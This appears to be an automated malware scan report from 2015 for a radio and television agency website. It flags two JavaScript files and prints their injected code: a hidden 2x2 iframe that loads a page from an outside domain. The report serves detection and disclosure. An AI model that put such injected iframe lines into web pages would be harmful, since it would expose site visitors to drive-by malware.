Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=radioandtelevisionagency.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://radioandtelevisionagency.com/ | 200 OK Content-Length: 8053 Content-Type: text/html | clean |
http://radioandtelevisionagency.com/wpscripts/jsFlashVer.js | 200 OK Content-Length: 8057 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe ></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); ver break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); document.write('<iframe ></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://radioandtelevisionagency.com/wpscripts/jspngfix.js | 200 OK Content-Length: 1002 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe ></iframe>');
var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5|6)/.test(navigator.userAgent) && navigator.platform == "Win32"; function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase()) event.srcElement.src = blankSrc; event.srcElement.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + src + "',sizingMethod='scale')"; } else { event.srcElement.runtimeStyle.filter = "";} } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); document.write('<iframe ></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://radioandtelevisionagency.com/home.html | 200 OK Content-Length: 8053 Content-Type: text/html | clean |
http://radioandtelevisionagency.com/test404page.js | 404 Not Found Content-Length: 428 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: radioandtelevisionagency.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 09:51:20 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8053
Content-Type: text/html
...8053 bytes of data.
GET / HTTP/1.1
Host: radioandtelevisionagency.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 09:51:20 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8053
Content-Type: text/html
...8053 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: radioandtelevisionagency.com
Referer: http://www.google.com/search?q=radioandtelevisionagency.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: radioandtelevisionagency.com
Referer: http://www.google.com/search?q=radioandtelevisionagency.com
Result:
The result is similar to the first query. There are no suspicious redirects found.